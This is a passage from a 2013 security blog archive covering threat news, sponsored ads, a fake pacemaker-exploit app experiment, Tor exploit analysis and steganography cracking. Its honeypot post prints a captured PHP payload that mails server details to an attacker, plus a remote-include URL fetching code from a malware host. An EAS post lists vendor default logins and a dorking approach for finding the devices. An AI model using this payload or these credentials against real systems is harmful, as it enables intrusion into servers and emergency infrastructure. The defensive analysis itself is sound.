Recorded Future recently announced the release of their [1]Cyber Threat Intelligence Application. The new app adds a set of real-time trend signals for attackers, TTPs, targets, and hacktivist operations. You can see whats trending for each of the four categories, brush across entities to see cross-linkages, and drill down on interesting items to dig in and analyze. The application presents a real-time dashboard of cyber threats, and allows ltering based upon threat, target, operation, or any other criteria. One of the sta from Recorded Future was kind enough to demo the application for me today, and I am very impressed. You can get a brief glimpse of the app through the [2]YouTube video. 178
3.7. July
BlogBook
For examples of the data available, check out my [3]Threat Watch site, which is powered by Recorded Future.
1. https://www.recordedfuture.com/how-people-use-recorded-future/cyber-security/ 2. http://www.youtube.com/watch?v=px44vi3gJKA&feature=youtu.be 3. https://sites.google.com/site/caffsec/current-cyber-threats
3.6.8
Guest Post: Hackers Breakfast: TrainACE and n2grate Team Up for a Free Hacking Seminar (2013-06-28 20:58)
The following is a Guest Post from TrainACE. I attended the last Hackers Breakfast, and found it a very informative training seminar. You can read my thoughts on the last Hackers Breakfast [1]here. TrainACE and their cyber security training extension, Advanced Security are announcing another installation in their series of free hacking seminars, dubbed Hackers Breakfast. Previously having planned an event with FireEye, they have teamed up with [2]n2grate Government Technology Solutions this time around to host the latest installation featuring multiple speakers and training demonstrations. Blue Coat and Solera Networks will have Subject Matter Expert technicians talk about mission assurance technologies and web-based security. A dierence from this Hackers Breakfast and the previous event in the series is the inclusion of live demonstrations. The session for product demonstrations will feature kiosks related to advanced threat protection from Blue Coat, Netronome, and Packet Shaper. Event sponsor Solera Networks will have an exhibit for big data security intelligence and analytics. The seminar itself will start o with a presentation on web-based security and its signicance to mobile workers, social networking, and threat protection. The speakers will address web-based security on a number of devices, covering users who own desktops, laptops, and mobile platforms. Next up on the itinerary will be the break for kiosk. For the rest of the seminar, a session will cover how the Department of Defense and other federal agencies should handle mission-critical program security. The seminar will close with another period allotted to additional product and training demonstrations. However, the opportunity is only available to Government and Department of Defense employees and the event is capped at 70 registrants. Sign up immediately in order to reserve a place at this leading edge event! Hackers Breakfast will be held at TrainACE in Ashburn, VA on July 24, 2013. The event opens with registration and breakfast at 8:00AM and will nish at 12:30PM. Learn more and register online here: [3]Hackers Breakfast The FREE Hacking Training Seminar Series by TrainACE.
1. http://caffeinesecurity.blogspot.com/2013/04/hackers-breakfast-absolutely-great.html 2. http://www.n2grate.com/ 3. http://www.hackersbreakfast.com/
3.7
3.7.1
July
A Confession to my Twitter Users - And Thank You (2013-07-01 23:18)
I have a confession to all my Twitter users. Ive been using you all. On my Twitter feed ([1]https://twitter.com/CaSec) you will see automated posts of news and new exploit code from Pastebin. These automated posts are generated using RSS feeds and Dlvr.it. Truth is, I dont have time to read all of those articles and exploits Im posting. Instead, Ive successfully crowdsourced my security news - I read what you reply to, favorite, and retweet. After all, if you found it interesting and worth reading, I should probably read it as well.
179
BlogBook
3.7. July
As I approach 2,000 followers on Twitter, I just want to say thank you to each and every one of you who follow me. You help me more than you know. Thanks to you all, I know what stories are important to read. Its taken two years to get here, and Ive gone a long way from my original 5 Twitter followers. Best of all, Ive even gotten back in touch with a few old friends, and made some new ones in the process. So to each and every one of my Twitter followers, thank you for following me and interacting with my tweets!
1. https://twitter.com/CaffSec
3.7.2
Android Pacemaker Exploit Kit Released In Memory of Barnaby Jack

(2013-07-28 04:13)
In a disturbing move, a hacker ying under the ag of Anonymous has released an [1]Android application which [2]can possibly kill someone in memory of Barnaby Jack. Barnaby Jack was scheduled to deliver a demonstration of remote pacemaker hacking at [3]Black Hat. The application, named PaceXploit, allows any user with an Android cellphone to search for nearby vulnerable pacemakers and perform remote diagnostics, possibly killing the person.
[4] 180
Screenshot of the apps warning message.

3.7. July
BlogBook
[5] Screenshot of the app scanning for vulnerable devices. Give someone a Heart Attack? Theres an app for that.
1. http://anonymousmedia.org/paste/3ntHvB0s 2. http://pastebin.com/BQwpLtN5 3. http://www.reuters.com/article/2013/07/27/us-hacker-death-idUSBRE96P0K120130727 4. http://1.bp.blogspot.com/-GCJl0tZLmCk/UfTRSmFMcSI/AAAAAAAAAhE/p35BVGwGbj4/s1600/2013-07-28_03-31-11.png 5. http://1.bp.blogspot.com/-jbmJtYd9xWg/UfTRXfkBnDI/AAAAAAAAAhM/DjZ5JHm58kI/s1600/2013-07-28_03-31-28.png
3.7.3
(2013-07-28 18:31)
This comment has been removed by a blog administrator.
3.7.4
PaceXploit - The Truth Revealed, and an Apology (2013-07-28 23:11)
I received a message today from an IOActive sta member regarding the PaceXploit app. I have pulled the original blog post, and want to apologize if this was insensitive of me. I was going to wait a few days to reveal this, but as I have been contacted by IOActive, I am going ahead and revealing the truth. The truth is, I created the PaceXploit app. It does nothing. It has no capability to locate or connect to medical devices. The entire app was a social experiment by several of us in the security community to see how many people would actually press the button to use an Android app which could possibly remotely kill someone. It was insensitive to include Barnabys name, and I really do apologize for that. To be clear, I only wrote the app and collected the usage data through Google Analytics, with the intention of group review and analysis of the data. Barnabys name was not included in the app itself. Others were responsible for the apps distribution and promotion. Any questions or concerns regarding the distribution or promotion, I suggest be sent to ihazcandy on Twitter. I purposely left my name inside the code for the app, so that any serious security researcher analyzing it could quickly identify its source. As such, I removed my blog post as soon as a researcher from IOActive contacted me and requested I do so. To make things clear, my intention was never to try and gain fame or increased readership for my blog. If I had intended that, I would have made the app redirect to my blog after running. Instead, I had the app redirect to a generic error page. My intention was merely to gather data on how many people would ignore
181
BlogBook
3.7. July
the warnings and proceed to run the diagnostic against a pacemaker, potentially killing someone. This was a spur of the moment decision, and I regret that the group didnt put more thought into it, and no one should have used a real world tragedy to perform research. Unfortunately, while I have deleted the original blog post, I cannot undo what has been done. My research into the ethics of how such an exploit would be used, was in itself not in accordance with the ethical standard I normally hold when performing research. Unfortunately, I did not design the app to collect install statistics, only statistics on how many people would run the app to completion. However, Im very disturbed by the fact that a single person even downloaded and installed the app. It could have very easily been malicious, and I applaud those within the community who actually questioned and analyzed the app. Those who downloaded and installed the app should seriously reconsider these actions in the future, as they are inherently dangerous. I want to personally express my condolences to IOActive and Barnaby Jacks family. I apologize once again if these actions were insensitive and if this has caused them any additional grief. That was never our intention.
[1] Statistics for those who used the app to run a diagnostic since 7/28/2013 at 3 AM despite multiple warnings it could kill
P.S. For the record I have no aliation with Anonymous. If you dont believe me, please review [2]previous posts. This post has been updated to clarify the distribution and promotion methods of the app in question.
1. http://1.bp.blogspot.com/-8ykSW7swD2E/Ufg7P1lThUI/AAAAAAAAAhw/biRH9tXnNlU/s1600/pacemaker-stats.png 2. http://caffeinesecurity.blogspot.com/search/label/Anonymous
3.7.5
How Vulnerable Is The Emergency Alert System? (2013-07-29 19:44)
Im sure by now everyone has heard about the Emergency Alert System [1]Zombie Attack incident. IOActive even released a [2]security advisory about the vulnerabilities with DASDEC Emergency Alert System digital alert systems. However, the incident raises further concerns, such as who in their right mind hooked up the Emergency Alert System to the Internet in the rst place? If someone wanted to hack the Emergency Alert System, rst they would need to know what hardware/software is out there. (Un)fortunately the FCC has already done part of this research and published a [3]vendor list. I started looking at the approved companies, and quickly became horried by what I found. Looking at the DASDEC (the system with the original vulnerability), I quickly found the systems [4]manual. Just glancing through the manual, I immediately found a screenshot showing the full URL used to access the DASDEC web interface. This can easily be used to generate a Google dork. 182
3.7. July
BlogBook
[5] DASDEC II Login Screen (from user manual)Below the screenshot, the default login of Admin/dasdec is ever so conveniently displayed. Hopefully, DASDEC is the exception to the rule, and none of the other EAS systems are so easily accessible...right? The next system I looked at was EASyCAP from Trilithic. Trilithic also makes their [6]manuals available online. Sure enough, checking the EASyCAP manual, this product too has a web interface. This interface also has a default username and password.
[7] EASyCAP User Account Interface (from user manual) Trilithic also provides the URL for their service, making a Google dork easy as well.
[8] EASyCAP Access Instructions (from user manual) The third EAS system I picked to examine is the SAGE ENDEC, which also has a [9]manual available online. Sure enough, this EAS system also has a web interface, and can be accessed using the default login of Administrator/1111. Looking through the feature list of other EAS systems on the FCCs list, it appears that every single EAS can be accessed using a web browser. This is quite honestly frightening. Something important to note here is that Ive never used the Emergency Alert System, ever. Ive never heard of any of these systems until I started researching today. And yet, within a couple hours, I already know that all of the systems can be accessed over a web browser, by using publicly available data. Any systems
183
BlogBook
3.7. July
which are publicly accessible over the internet are most likely very lax in security, and administrators may not even know theyre publicly accessible. At this point, Im speechless. How could a system which is so critical to emergency communications in the United States be so vulnerable? Did no one blink an eye at the security implications of having theEmergency Alert System controllable by a web browser? To mitigate the possibilities of someone accessing the Emergency Alert System, network administrators should immediately verify that their EAS equipment is not accessible over the public internet by reviewing their rewall rules. I suspect this post may generate some high trac, so if youd like to contact me directly about it for some reason please email: casecblog <at> gmail <dot> com.
1. http://nakedsecurity.sophos.com/2013/07/10/ did-brainless-flaw-in-us-emergency-alert-system-lead-to-epic-zombie-attack-warning/ 2. http://www.ioactive.com/pdfs/IOActive_DASDEC_vulnerabilities.pdf 3. http://transition.fcc.gov/pshs/services/eas/vendors.html 4. http://www.digitalalertsystems.com/pdf/DASDEC_II_manual.pdf 5. http://4.bp.blogspot.com/-8lVxKcBDqU8/Ueh2KtDSnZI/AAAAAAAAAf0/qKlkN3yEGGQ/s1600/dasdec.png 6. http://eas.trilithic.com/Documents/Manuals/index.html 7. http://4.bp.blogspot.com/-rUKXCUsqveM/Ueh4pM4-2_I/AAAAAAAAAgg/zpS0y-22xbs/s1600/easycap.png 8. http://1.bp.blogspot.com/-zQLShD1Z4tc/Ueh6GGXzFvI/AAAAAAAAAgw/43rPODg1zkg/s1600/EASyCAP-2.png 9. http://www.sagealertingsystems.com/support-manuals.htm
3.7.6
DISA Gold Disk FOIA Request Sent (2013-07-30 10:55)
I have sent a FOIA request to DISA for public release of the DISA FSO Gold Disk. It is my hope that this request will be rather painless, and that DISA will release all requested materials. If/when DISA does release the requested materials, I will establish an open source project on either SourceForge or Google Code for continued development of the Gold Disk. My letter is below. I should receive a response within 30 days.
Hello, I am writing to you to request public release of the following: DISA FSO Gold Disk binaries DISA FSO Gold Disk source code DISA FSO Gold Disk developer documentation DISA FSO Gold Disk user/administrator manuals
Per http://iase.disa.mil/stigs/index.html 184

3.7. July
BlogBook
The DISA FSO Windows Gold disk tool provides an automated mechanism for compliance reporting and remediation to the Windows STIGs. The FSO Windows Gold Disks are an unlicensed tool developed by the FSO, the use of this tool is completely at the users own risk. Currently, the Gold Disk supports Windows XP, Windows Vista, Windows 2003, Windows 2008 R1. There are no plans to develop Gold Disks for future technologies or products, FSO will utilize the SCAP standards for compliance reporting for Windows 7.
Since the tool is unlicensed and developed by FSO, that puts the tool in Public Domain. Furthermore, the DISA FSO Gold Disk is no longer supported for use within DoD, and development has ceased, meaning the tool is no longer in use within the DoD.
This tool could be of great use to the private sector, and would help increase the security of our nation.
I understand that the DISA Gold Disk does contain IAVM information which is still FOUO. As such, I am agreeable to this information being sanitized prior to public disclosure.
Since this is a FOIA request for public interest, I would like to request that any fees be waived.
I look forward to your response.
Thanks, Ken Buckler Caeine Security
3.7.7
URGENT! McAfee VirusScan Artemis False Positives! (2013-07-31 20:32)
Ive been tipped o that McAfee VirusScans Artemis Global Threat Intelligence is triggering numerous false positives. I do not have details on this (and if anyone has further details please post them), but McAfee has made the following KB article available: [1]https://kc.mcafee.com/corporate/index?page=content &id=KB78993 According to sources online, Artemis is [2]deleting numerous les making machines [3]inaccessible.
1. https://kc.mcafee.com/corporate/index?page=content&id=KB78993 2. http://www.404techsupport.com/2013/07/mcafee-artemisgti-false-positive-taking-down-pcs/?utm_source=dlvr. it&utm_medium=twitter 3. https://twitter.com/OASec1/status/362731623743098880
185
BlogBook
3.8. August
3.8
3.8.1
August
@th3j35t3r Domain Seized by DHS, Arrested at Blackhat? (2013-08-02 14:24)
UPDATE: It appears that jesterscourt.cc is restored. This appears to all have been a hoax on the Jesters part. It has been brought to light that The Jesters domain, jesterscourt.cc, has been seized by the Department of Homeland Security (DHS). At the same time, Jester has gone dark on Twitter, with no new posts since [1]July 31. Jester had already made [2]multiple [3]posts showing that he was attending the Blackhat conference in Las Vegas. Does this mean Jester has been arrested at the Blackhat conference? This would explain the sudden siezure of his domain, and why his Twitter feed has gone dark. This wouldnt be the rst time a hacker was arrested at a Las Vegas conference. In 2001 a Russian hacker was [4]arrested at DEFCON.
[5] Its important to note that Jester has before faked his own retirement in the Smedley Manning [6]incident.
1. https://twitter.com/th3j35t3r/status/362649015080329216 2. https://twitter.com/th3j35t3r/status/362430003029344256 3. https://twitter.com/th3j35t3r/status/362605780203089922 4. http://usatoday30.usatoday.com/tech/news/2001-07-17-russian-hacker.htm 5. http://3.bp.blogspot.com/-g9xQqjw-R5w/Ufv2eCBE5dI/AAAAAAAAAiA/RcLOxwDLLZQ/s1600/j-dhs.png 6. http://news.softpedia.com/news/th3j35t3r-Is-Back-Claims-Smedley-Manning-Is-Bluffing-270400.shtml
3.8.2
Blog Updated to Include Shodan Searches and Free Security Resources

(2013-08-02 23:10)
Ive setup a couple experimental IFTT recipies to automatically post new Shodan searches to my blog, as well as post new Cyber Security resources as they become available. If you notice it malfunctioning, please let me know via Twitter. This is a brand new feature, and I hope it works well.
3.8.3
New Shodan Search: Trilithic (2013-08-02 23:36)
A New Shodan Search is now saved on SHODAN - Recently Saved Searches Title: Trilithic 186
3.8. August
BlogBook
Description: Trilithic creates cable and satellite equipment for diagnostics and maintenance, including Emergency Alert System equipment. URL: [1]http://www.shodanhq.com/?q=Trilithic
1. http://www.shodanhq.com/?q=Trilithic
3.8.4
Massive TOR Hidden Service Compromise (2013-08-04 13:59)
It was [1]announced today on Twitter that one of the major hidden services hosting companies, has been delivering[2] malicious content and the hosted sites [3]shutdown after a [4]raid by law enforcement. Supposed, among the compromised services include TorMail, which provides anonymized email services. If TorMail has been compromised, this could have broader reaching eects, including giving the FBI and Interpol the ability to directly access associated accounts outside of Tor hidden services. It would then be easy for the authorities to request from associated websites a log of associated IP addresses. This spells bad news for anyone who uses Tor for illegal purposes, and a major win for the law enforcement community. NOTE: You can view deobfuscated versions of the malicious code at my Malware Analysis Google Code site: [5]https://code.google.com/p/casec-malware-analysis/sou rce/browse/trunk/TorFreedomHosting/
1. http://www.twitlonger.com/show/n_1rlo0uu 2. http://pastebin.mozilla.org/2776374 3. https://blog.torproject.org/blog/hidden-services-current-events-and-freedom-hosting 4. http://www.independent.ie/irish-news/courts/ fbi-bids-to-extradite-largest-childporn-dealer-on-planet-29469402.html 5. https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/TorFreedomHosting/
3.8.5
What the FBI probably knows about Tor Users (2013-08-05 00:31)
[1]Vlad Tsyrklevich has posted an excellent analysis of the [2]payload delivered by the Tor Browser Bundle exploit. This payload was delivered to every Tor Browser Bundle user who visited a Freedom Hosting hosted Tor Hidden Service, including Tormail. According to Vlad, the exploit sends the hostname and MAC address of the local system to 65.222.202.54 over HTTP, then crashes. So, what can the FBI do with this information? Well, they now have a record of what systems were visiting all sites on Freedom Hosting. It is also safe to assume that the FBI now has all emails and logs stored by Tormail. The Tormail emails can be an excellent datamine without any additional info. Many Tormail users could have possibly revealed sensitive information over Tormail, including their name and home address, especially if using Tor to order illicit goods or services. However, the hostname and MAC address can also be useful. For example, the FBI can use the MAC address to subpoena a computer manufacturer to nd out who purchased the computer. They can then use the hostname to verify they have the right person. For example, lets say the FBI got a hostname of DOE-PC and a MAC address matching a Dell laptop. The FBI contacts Dell with a subpoena Did you sell a computer to someone named Doe with MAC address XX:XX:XX:XX, Dell can send them the transaction information, including home address. This is a big win for law enforcement worldwide, and should help to end some of the illegal activities occurring on Tor.
187
BlogBook
3.8. August
Just remember kiddies, there is no such thing as private on the Internet. Not even on Tor. NOTE: You can review the deobfuscated JavaScript at my Malware Analysis Google Code site: [3]https://code.google.com/p/casec- malware-analysis/source/browse/trunk/TorFreedomHosting/
1. https://twitter.com/vlad902 2. http://tsyrklevich.net/tbb_payload.txt 3. https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/TorFreedomHosting/
3.8.6
Buyers Guide: Selecting an SSL Management System (2013-08-07 15:47)
The following is external content provided as a free resource for blog readers.
[1] An eective SSL Management System provides for the rapid deployment of Enterprise Security, Trust and Regulatory Compliance. SSL Management enables you to condently address security challenges, signicantly reducing your business risks and operating costs. Read more about best practices for selecting an SSL Management System. [2]Request Free! [3]More Information...
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_como06 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_como06 3. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_como06
3.8.7
304% Return on Investment with SilverSky Network Security Solutions

(2013-08-08 14:32)
[1] Download this study to learn how to evaluate the potential nancial impact of SilverSky security services for your organization. [2]Request Free! [3]More Information... 188
3.8. August
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_peri30 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_peri30 3. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_peri30
BlogBook
3.8.8
SilverSky Email Encryption Demo (2013-08-08 14:32)
[1] SilverSky owns and operates the infrastructure, so no software is required at the organization level, minimizing cost and sta upkeep. The solution oers a variety of customizable tracking and reporting capabilities through a web portal and all messages can be stored for compliance purposes with SilverSky Email Archive. [2]Request Free! [3]More Information...
3.8.9
Email Data Loss Prevention (DLP) (2013-08-08 14:32)
[1] Watch this video to see rsthand how SilverSkys policy-driven Email Data Loss Prevention solution provides unmatched security and privacy at a fraction of the cost and complexity of old fashioned appliance and end-point approaches. [2]Request Free! [3]More Information...
3.8.10
The Evolution and Value of Purpose-Built Backup Appliances (2013-08-08 20:47)
189
BlogBook
3.8. August
[1] Customer strategies for data protection and recovery continue to be dictated by aggressive SLAs, rapid recovery, and ease of integration in existing environments. As a result, rms are embracing more disk-based data protection technologies, including Purpose-Built Backup Appliances (PBBAs) to protect and recover data and applications. These appliances include features such as data deduplication, compression, encryption, and replication. Meanwhile, unabated data growth continues to pressure IT sta and protection and recovery processes, leading customers to consider alternative backup methods and targets. This IDC White Paper explores the increased use and adoption patterns of PBBAs, both integrated and targeted, and the utility these appliances provide to customers in their data protection processes. In addition, this White Paper illuminates the customer value that Symantecs Backup Exec and NetBackup appliances bring to the data protection and recovery process. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_sym139 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_sym139
3.8.11
Symantec Intelligence Report: June 2013 (2013-08-13 22:47)
[1] In this months report we take a look at what has happened in a number of key sections of the threat landscape. We delve deeper into the trends surrounding vulnerabilities, including zero-day, browser, and plug-in vulnerabilities. We also take a look at phishing trends over the last few months, as well as what has been happening in both the spam and malicious code areas of the threat landscape. Finally we include the latest high-level stats surrounding data breaches in June. Weve also provided a run-down on the biggest security stories for the month of June, recapping what happened and what that means to our readers. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_sym144 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_sym144
3.8.12
HP StoreOnce:
(2013-08-15 12:32)
Boldly Go Where No Deduplication Has Gone Before
The following is external content provided as a free resource for blog readers. 190
3.8. August
BlogBook
[1] This paper will describe the challenges of data protection, why deduplication is critical to meeting the challenges, how HP is achieving its vision of federated dedupe with StoreOnce and what HPs StoreOnce VSA announcement and achievement means to backup services providers, enterprises with remote or branch oces and small and medium businesses as well. Sponsored by HP and Intel Xeon processors. Intel, the Intel logo, Xeon, and Xeon Inside are trademarks or registered trademarks of Intel Corporation in the U.S. and/or other countries. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_hp384 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_hp384
3.8.13
A Look At A Simple PHP Cross Site Scripting Attack (2013-08-18 02:00)
Someone was recently kind enough to attack my honeypot with an extremely simple PHP cross site scripting attack, suitable for teaching others. How does a PHP cross site scripting attack work? Some PHP scripts allow loading of external scripts through special HTTP parameters. For example, am attacker could invoke a PHP cross site scripting attack against a vulnerable le using a URL such as:
http://myhoneypot.net/scripts/php/vulnerablescript.php?src=http:/ /malwaresite.info/malware.php The above attack would result in vulnerablescript.php executing malware.php. One of the simplest attacks Ive seen is detailed in the following lines:
<?php $language = eng; $auth = 0; $name = ; // md5 Login $pass = ; // md5 Password /**************************************************************** *************************************************************** *******************************/ error reporting(0); $time shell = .date(d/m/Y - H:i:s).; $ip remote = $ SERVER[REMOTE ADDR]; $from shellcode =setoran @.gethostbyname( $ SERVER[SERVER NAME]).;
191
BlogBook
3.8. August
$to email = komixobh@gmail.com; $server mail = .gethostbyname( $ SERVER[SERVER NAME]). - . $ SERVER[HTTP HOST].; $linkcr = Ni Bos Link Nya : . $ SERVER[SERVER NAME].. $ SERVER[REQUEST URI]. - IP Yang Gunain : $ip remote - Time: $time shell; $header = From: $from shellcode Reply-to: $from shellcode; @mail( $to email, $server mail, $linkcr, $header); ?>
In this attack, the server sends an email message to komixobh@gmail.com providing the server name and URL exploited. This eectively tells the attacker where their scanning script succeeded, so that they can attack with more advanced scripts. Quite genius really, dont let the server admin see your full capabilities in case its a honeypot. Unfortunately for our attacker, this script reveals his email address (komixobh@gmail.com) which is being posted publicly on my blog. My blog is frequented by spam crawlers on a regular basis, so hopefully komixobh enjoys speaking with Nigerian Princes and receiving oers for male enhancement drugs. The exploit really is that simple though, write a PHP script, upload it somewhere, and exploit vulnerable scripts with cross site scripting. This is why its important to always maintain current security patches, and follow vendor and industry best practices for securing your web applications. You can see more example PHP scripts at my [1]Malware Analysis Google Code page.
1. https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/www-honeypot/raw-files/
3.8.14
How
Virtualization
is
Key
to
Managing
Risk
for
the
SMB
Market
(2013-08-19 18:32)
[1] Virtualization can save your infrastructure before an outage occurs and can also ensure an ecient recovery without data loss. Read this eBook to learn how VMware virtualization solutions can help prepare your systems for a disaster and protect your data if one does strike. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_vmwa86 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_vmwa86
192
3.8. August
BlogBook
3.8.15
Implementing Enterprise BYOD with Mobile Certicates (2013-08-21 17:33)
[1] While the majority of companies now support BYOD, few have been able to eectively manage the phenomenon. Implementing a mobile certicate oers a level of stability, security, and authentication that passwords cant provide. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_como07 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_como07
3.8.16
A Look at Fax Phishing (2013-08-22 18:57)
I recently setup a new honeypot which appears to be an IT security related company. In addition to a few other hidden gems, this honeypot is complete with fake contact information for the company, including email, phone, and fax. Today I received my rst hit from the honeypot - and I was very surprised when it was a phishing attempt over fax!
[1] The Phishing Attempt sent over FaxThis fax claims to be from the companys HR department, and is addressed to all employees, and advertises a 6 day all inclusive vacation at an exotic out-of-the-country location for only $129 per person. The old adage holds true here - if something sounds too good to be true, it probably is. A quick search shows that the number is very commonly used in scams, as seen [2]here and [3]here.
193
BlogBook
3.8. August
Of course the dead giveaway that this is a scam is that my honeypot doesnt have an HR department, and no one actually exists in the company to send such an oer out to the honeypots nonexistent employees. I have a feeling this new honeypot will provide for some great entertainment. Stay tuned for more!
1. http://3.bp.blogspot.com/-CmiuPaSINkE/UhaVLyqE_3I/AAAAAAAAAic/dVVakjGTLGw/s1600/phishing_fax.png 2. http://800notes.com/Phone.aspx/1-866-590-7027 3. http://whocallsme.com/Phone-Number.aspx/8665907027
3.8.17
My Free Magazines! New Website! (2013-08-24 15:51)
[1] I started a new website today called My Free Magazines! Its a free resource for just about every industry, oering free magazines, whitepapers, and technical resources. Go check it out at [2]http://www.MyFreeMagazines.tk
1. http://4.bp.blogspot.com/-uXikmyMP-WY/UhkOTc-ibuI/AAAAAAAAAi8/4QhVZjLO61E/s1600/myfreemagazines-banner.jpg 2. http://www.myfreemagazines.tk/
3.8.18
Blade Server Strategies: Optimizing the Data Center (2013-08-27 16:47)
[1] Blade servers bring eciency and agility to IT infrastructures by making it easy to add and move resources and applications. In a recent study, IDC found that companies using blade servers were able to cut operating expenses by 64 percent. But to extract the optimal benets from blade servers, IT shops must chose a vendor whose strategy and tools reduce complexity, simplify management, support lifecycle automation and deliver the exibility to work in any environment. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_hp385 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_hp385
3.8.19
Why the Syrian Electronic Army Didnt Hack the NY Times (2013-08-27 20:18)
Im just going to come out and say it. The Syrian Electronic Army (SEA) is a fraud. They didnt hack the New York Times, or any other high visibility websites today. 194
3.8. August
BlogBook
[1] All SEA did today was an extremely old trick of [2]domain hijacking. For those not familiar with it, heres a [3]great writeup on how domain hijacking works. Now its possible that SEA performed the [4]domain hijacking through compromise of [5]MelbourneIT, this in itself is also unlikely, based upon previous successful attacks using low-tech spearphishing (targeted social engineering) to obtain credentials of target organizations. Previously, Syrian Electronic Army gained control of the Associated Press Twitter account, The Onions Twitter account, and the advertising service Outbrain, all through spearphishing attacks. Sensationalize their hacking abilities all you want. The Syrian Electronic Army has so far displayed very little technical skill, instead attacking soft targets and using social engineering. While these attacks have so far been eective, they only point out the lack of security awareness training in todays workforce, and not any serious software aws. Any organization which has been directly hit by SEA (and that excludes the victims of domain hijacking) should seriously reexamine their employee security awareness training, and possibly consider bringing in an outside consulting company to help identify deciencies. The weakest link in any network will always be uneducated users.
1. http://1.bp.blogspot.com/-hERMuNIOauM/Uh0_cKAz7II/AAAAAAAAAjY/Pr50ba7bxlE/s1600/sea-fraud.jpg 2. http://www.theregister.co.uk/2013/08/27/twitter_ny_times_in_domain_hijack/ 3. http://secretgeek.net/sg_hijack_1.asp 4. 5. http://www.melbourneit.com.au/ http://labs.alienvault.com/labs/index.php/2013/ several-domains-including-new-york-times-and-twitter-ones-attacked-by-syrian-electronic-army/
3.8.20
#ALERT: As Tensions Escalate with Syria,

(2013-08-27 23:21)
Beware Phishing Attacks
As tensions escalate with [1]Syria, it is highly probable that phishing attacks will begin accompanying real news articles. A common tactic used by malware writers and phishing senders is to exploit recent news to get you to download their malicious les. This could be through a well crafted email with an embedded link, or infected attachment, claiming to be a real news article. The most important step you can take is to be vigilant, and dont click on links within emails, even if they appear to original from friends. A common tactic now used by scammers and phishers is to compromise someones email account, then use that email account to send messages to the persons contacts. Also, dont expect this to just be through email. Many spammers and phishers are now using social media, including Facebook and Twitter messages. Know the signs of targeted spear phishing. If you work for the government, or are employed by a government contractor, you will be a prime target. Spearphishing directed towards you may appear very credible, and
195
BlogBook may even be sent to your work email address. Stay Vigilant.
1. http://www.bbc.co.uk/news/world-us-canada-23845800
3.8. August
3.8.21
Anon Steganography Cracked, Further Mysteries Lie Within (2013-08-30 01:10)
Flashback to January of this year when I posted that Anonymous has most likely been [1]inltrated by multiple organizations (including law enforcement and terror organizations) and may be [2]unwillingly distributing terrorist messages. I have nally successfully cracked open one of the Anonymous related images suspected of containing Steganography...and Im quite intrigued by its contents. As far as I know, this is only the second Steganographic image found in the wild which has been successfully cracked. The rst image was posted online by NBC [3]back in 2001 as part of a news story, and had a very simple password of abc. First, a little background. In my previous post, I revealed that a suspected steganography image had been posted by the twitter user @57UN, who was very involved and inuential with anonymous. Ever since, Ive been keeping tabs on @57UN, looking for unusual behavior. Well wouldnt you know it, they didnt disappoint me! Recently @57UN switched their account name to @TechoPirate, then shortly after disappeared completely. Since then, a new @57UN account has appeared, but I suspect it is not the original @57UN.
[4] Anonymous discussing @57UN aka @TechoPirate Shortly after I noticed @TechoPirate had disappeared, I immediately began archiving and analyzing his/her twitpic les before they disappeared from the web for good. Running Stegdetect, I found several additional les with suspected embedded data which I had originally overlooked. Interestingly enough, two of the les were embedded using Outguess, instead of jphide as previous les were found using. I was actually able to crack both les. The rst le to be cracked is the image below, which used the password sophia (note the space at the beginning). 196
3.8. August
BlogBook
[5]
Original image as posted on Twitpic
1. C:\Users\Ken\Projectstbackslashstegdetect>stegbreak.exe -r rules.ini -f C:\Users\Ken\Pro 2. jects\dictionary\eNtr0pY ALL sort uniq.dic -t o C:\Users\Ken\Projectsxtbackslashstegdete 3. ct\target\687336425.jpg 4. Loaded 1 les... 5. C:\Users\Ken\Projectstbackslashstegdetect\target\68733642 5.jpg : outguess[v0.13b]( sophia) 6. [Encore unsupported executable not stripped][U. $.. $......H..] 7. Processed 1 les, found 1 embeddings. 8. Time: 0 seconds: Cracks: 2584, Inf c/s Since this le had such a weak password, I was able to crack it in under one second. ...but thats where the real mystery begins! You see, the embedded le itself is unintelligible, but detected by both Stegdetect and [6]VirusTotal as an Encore unsupported executable not stripped. Im not familiar with this type of le, so if anyone would care to enlighten me, please feel free to post in the comments section below. I really need some help guring out just what this le is - and doing so may crack the case wide open of whos really pulling the strings behind Anonymous? For those interested in trying to gure out what the le is/does, I have it uploaded here: [7]https://code.google.com/p/casec-malware-analysis/source/bro wse/trunk/steg/687336425.txt CAUTION: This le is an unknown type, and of unknown origin. It could be malicious in nature, be wary. I have given the le a .txt extension in case it is malicious. Note that a second le was also cracked. However, attempts to extract the data using Outguess have shown that the embedded 